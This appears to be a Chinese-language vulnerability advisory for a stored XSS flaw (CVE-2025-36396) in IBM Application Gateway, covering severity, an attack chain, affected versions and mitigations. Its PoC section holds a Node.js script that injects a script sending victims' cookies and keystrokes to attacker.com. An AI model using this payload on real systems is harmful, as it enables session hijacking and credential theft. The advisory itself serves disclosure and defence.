CVE-2025-36396 | IBM Application Gateway 跨站脚本漏洞

漏洞信息

漏洞编号

CVE-2025-36396

漏洞类型

XSS (跨站脚本)

CVSS评分

5.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

需要交互 (UI:R)

影响产品

IBM Application Gateway

漏洞概述

CVE-2025-36396是IBM Application Gateway中的一个存储型跨站脚本（Stored XSS）漏洞，该漏洞影响23.10至25.09版本。漏洞源于Web UI对用户输入验证不充分，认证用户可以在界面中嵌入恶意JavaScript代码。当其他用户访问被植入恶意脚本的页面时，攻击者注入的代码将在受害者浏览器中执行。攻击者可利用此漏洞窃取会话Cookie、劫持用户会话、诱导受害者输入敏感凭证，或在用户不知情的情况下执行未经授权的操作。由于该漏洞需要认证用户权限，攻击门槛相对较高，但在多用户环境中仍构成严重威胁。攻击者通过长期潜伏在合法会话中，可逐步收集敏感信息并横向移动，对企业安全造成深远影响。IBM安全团队于2026年1月20日正式披露此漏洞，CVSS评分5.4，属于中危级别。

技术细节

漏洞根源在于IBM Application Gateway的Web管理界面未对用户可控输入进行充分的HTML实体编码。认证用户通过构造特定payload（如<script>alert(document.cookie)</script>），可在用户资料、备注或配置字段中植入恶意脚本。当管理员或普通用户访问包含恶意内容的页面时，浏览器会解析并执行注入的JavaScript代码。由于浏览器无法区分合法脚本和攻击者注入的脚本，攻击者可以访问用户的认证令牌、会话ID以及其他敏感数据。攻击者可进一步利用窃取的凭证维持持久化访问，或通过社工手段获取更多敏感信息。该漏洞的利用需要攻击者具备有效的应用账号（低权限即可），攻击向量为网络层面，用户交互为必需（UI:R），影响范围涵盖机密性和完整性（低级别），可用性不受影响。

攻击链分析

STEP 1

步骤1

攻击者获取IBM Application Gateway的有效用户账号（低权限即可）

STEP 2

步骤2

攻击者构造恶意XSS payload并通过Web UI的输入字段（如用户资料、备注、配置项）提交

STEP 3

步骤3

恶意脚本被存储在服务器端，当其他用户访问相关页面时自动加载

STEP 4

步骤4

受害者（管理员或普通用户）访问植入恶意脚本的页面，浏览器执行注入的JavaScript代码

STEP 5

步骤5

攻击者通过JavaScript窃取受害者的会话Cookie、凭据或其他敏感信息

STEP 6

步骤6

攻击者利用窃取的凭证劫持会话、执行未授权操作或横向移动

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// CVE-2025-36396 PoC - IBM Application Gateway Stored XSS // This PoC demonstrates how an authenticated user can inject JavaScript // into the IBM Application Gateway Web UI const axios = require('axios'); async function exploitXSS(targetUrl, sessionCookie) { const xssPayload = '<script>\n' + ' // Steal session cookies ' + ' fetch("https://attacker.com/log?c=" + encodeURIComponent(document.cookie)); ' + ' // Alternative: keylogger ' + ' document.addEventListener("keypress", function(e) { ' + ' fetch("https://attacker.com/keys?k=" + e.key); ' + ' }); ' + '</script>'; try { // Inject XSS payload into user profile/notes field const injectResponse = await axios.post( `${targetUrl}/api/user/profile`, { username: 'attacker_user', notes: xssPayload, email: '[email protected]' }, { headers: { 'Cookie': `JSESSIONID=${sessionCookie}`, 'Content-Type': 'application/json' } } ); console.log('[+] XSS payload injected successfully'); console.log('[+] Payload will execute when admin views user profile'); } catch (error) { console.error('[-] Exploitation failed:', error.message); } } // Usage: node cve-2025-36396-poc.js <target-url> <session-cookie> exploitXSS(process.argv[2], process.argv[3]);

影响范围

IBM Application Gateway 23.10

IBM Application Gateway 23.11

IBM Application Gateway 24.01

IBM Application Gateway 24.02

IBM Application Gateway 24.03

IBM Application Gateway 24.04

IBM Application Gateway 24.05

IBM Application Gateway 24.06

IBM Application Gateway 24.07

IBM Application Gateway 24.08

IBM Application Gateway 24.09

IBM Application Gateway 24.10

IBM Application Gateway 25.01

IBM Application Gateway 25.02

IBM Application Gateway 25.03

IBM Application Gateway 25.04

IBM Application Gateway 25.05

IBM Application Gateway 25.06

IBM Application Gateway 25.07

IBM Application Gateway 25.08

IBM Application Gateway 25.09

防御指南

临时缓解措施

在官方补丁发布前，可采取以下临时缓解措施：1) 限制Application Gateway的管理界面访问，仅允许可信IP访问；2) 实施严格的最小权限原则，限制低权限用户对敏感功能的访问；3) 启用Web应用防火墙(WAF)规则检测和阻止XSS攻击特征；4) 监控应用日志中的异常请求模式；5) 对管理员和用户进行安全意识培训，提醒不要点击可疑链接；6) 考虑启用双因素认证增强账户安全；7) 定期审计用户账户和权限配置。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-36396
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-36396
3 Details https://www.cvedetails.com/cve/CVE-2025-36396/
4 VulDB https://vuldb.com/cve/CVE-2025-36396
5 Link https://www.ibm.com/support/pages/node/7256857